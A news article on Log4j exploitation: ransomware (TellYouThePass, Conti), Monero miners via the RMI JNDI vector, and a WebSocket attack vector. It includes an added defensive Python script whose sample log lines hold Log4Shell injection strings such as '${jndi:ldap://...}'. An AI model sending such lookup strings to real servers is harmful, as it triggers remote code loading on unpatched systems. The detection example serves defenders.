Apache Log4j: New Attack Vectors, Ransomware Seen
Exploits Range From Injecting Monero Miners to Ransomware Activities
Cybersecurity experts continue to warn that nation-state attackers appear to be abusing or testing the Log4j vulnerability, while criminal groups are also targeting the flaw to drop malicious code - from ransomware to cryptomining software - and access brokers are reportedly harvesting credentials for sale to other cybercriminals (see: Nation-State Attackers Wielding Log4j Against Targets).
In an emergency directive issued on Friday regarding the Apache Log4j vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency has required federal civilian departments and agencies to immediately patch their systems or implement appropriate mitigation measures. CISA previously gave agencies until Friday to patch against Log4j exploits via its Known Exploited Vulnerabilities Catalog.
WebSocket is a computer communications protocol that provides a full-duplex communication channel over a single TCP connection, making it possible to open a two-way interactive session between a user's browser and a server. WebSockets are commonly used for features such as chat and alerts on websites.
"We understood that the impact of Log4j was limited to vulnerable servers. This newly discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability," says Matthew Warner, chief technology officer at Blumira.
Researchers have not yet found proof of active exploitation but say that the vector significantly expands the attack surface and "can impact services even running as localhost which were not exposed to any network."
"The client itself generally has no direct control over these WebSocket connections, which can silently initiate when a webpage loads. WebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack," Warner says.
Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and until recently inactive ransomware family, mainly affecting Chinese victims, according to Curated Intelligence.
"Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be predominantly affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service)," researchers at Curated Intelligence say.
KnownSec 404 Team's Heige first reported the ransomware activity. Citing a now-deleted tweet from Heige, the Curated Intelligence team says the ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability, with multiple replies to the tweet referencing TellYouThePass.
In addition to Heige's tweet, other researchers indicated that the ransomware family could be TellYouThePass. A Curated Intel member named @PolarToffee says, "On IDR, we've seen a very sudden spike in submissions for what is a very old ransomware (TellYouThePass) today. Not saying they are using Log4j2 but that's certainly interesting."
According to research published in the Chinese-speaking community, Sangfor Threat Intelligence found that various attack groups have used this vulnerability to launch extortion (ransomware) attacks.
"On December 13, Sangfor's terminal security team and Anfu's emergency response center jointly monitored a ransomware called Tellyouthepass, which has attacked both platforms. Sangfor has captured a large number of Tellyouthepass ransomware interception logs," according to the Sangfor Threat Intelligence team. "It is worth noting that this is not the first time that Tellyouthepass ransomware has used high-risk vulnerabilities to launch attacks."
Sangfor researchers also say that last year, the attackers used the EternalBlue vulnerability to attack multiple organizations.
Use of Monero Miners
Juniper Threat Labs says that most attackers who were earlier using the Lightweight Directory Access Protocol - or LDAP - JNDI vector to inject code into the victim's server are now shifting toward the Remote Method Invocation - or RMI - API.
"RMI is a mechanism that allows an object residing in one Java Virtual Machine (JVM) to access or invoke an object running on another JVM. To facilitate this interaction, the local JVM may require Java bytecode related to the remote object. This code is downloaded from a specified remote URL and loaded into the local JVM," according to Juniper researchers Alex Burt and Asher Langton.
The researchers say that RMI operations are subject to additional checks and constraints by a Java security manager, but that it has been proven previously that some JVM versions do not apply the same restrictions and policies to JNDI.
During further analysis, the researchers found that an obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. "Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x86_64 Linux targets. The full script also adds persistence via the cron subsystem," researchers say.
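The shift from the LDAP to the RMI JNDI vector that Juniper describes is something a defender can observe in their own logs, because the JNDI lookup string names its provider scheme. The following is an added detection example (not code from the article or from Juniper) that scans access-log lines for `${jndi:<scheme>:` lookups and tallies the schemes seen; the log lines, IP addresses and ports are constructed sample data using documentation address ranges.

```python
import re
from collections import Counter

# Constructed sample access-log lines (not from the article). Three carry a
# JNDI lookup string in the User-Agent field; one is benign traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/x}"
203.0.113.6 - - [13/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:RMI://198.51.100.9:1099/x}"
203.0.113.8 - - [13/Dec/2021:10:03:40 +0000] "POST /api HTTP/1.1" 200 77 "-" "${jndi:rmi://198.51.100.9:1099/x}"
"""

# A lookup opens with "${jndi:" followed by the JNDI provider scheme (ldap,
# rmi, ...) and another ":". The lookup is not case-sensitive, so neither is
# the match; surrounding whitespace is tolerated as well.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def find_jndi_lookups(line):
    """Return the lowercase JNDI provider schemes found in one log line."""
    return [m.group(1).lower() for m in JNDI_RE.finditer(line)]


def scan_log(text):
    """Scan log text; return (list of (line_no, schemes) hits, Counter of schemes)."""
    hits = []
    schemes = Counter()
    for line_no, line in enumerate(text.splitlines(), 1):
        found = find_jndi_lookups(line)
        if found:
            hits.append((line_no, found))
            schemes.update(found)
    return hits, schemes


if __name__ == "__main__":
    hits, schemes = scan_log(SAMPLE_LOG)
    for line_no, found in hits:
        print(f"line {line_no}: JNDI lookup via {', '.join(found)}")
    # On the constructed sample this prints {'ldap': 1, 'rmi': 2}
    print("scheme tally:", dict(schemes))
```

Run against real access, application or WAF logs, the tally per scheme over time shows whether the LDAP-to-RMI shift is reaching your own perimeter; any hit at all is a reason to confirm that the receiving application's Log4j is patched or has the JNDI lookup removed.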
Conti Group Activity
Threat intelligence firm Advanced Intelligence says that it has found the Conti ransomware group using the critical Log4Shell exploit to gain unauthorized access into VMware vCenter Server instances.
"Divided into several teams and involving tens of full-time members, the Russian-speaking Conti made over $150 million in the last six months," according to AdvIntel research.
Conti is one of several Russian-speaking ransomware operations - believed to be operating from countries that were formerly part of the Soviet Union - that have continued to hit targets in the U.S. and Europe, causing widespread disruption.
During its analysis, the threat intelligence firm found that multiple Conti group members had expressed interest in exploiting the vulnerability as an initial attack vector, which led to scanning activity that leveraged the publicly available Log4j2 exploit.
"The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit. Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network, resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions," the Advanced Intelligence researchers say.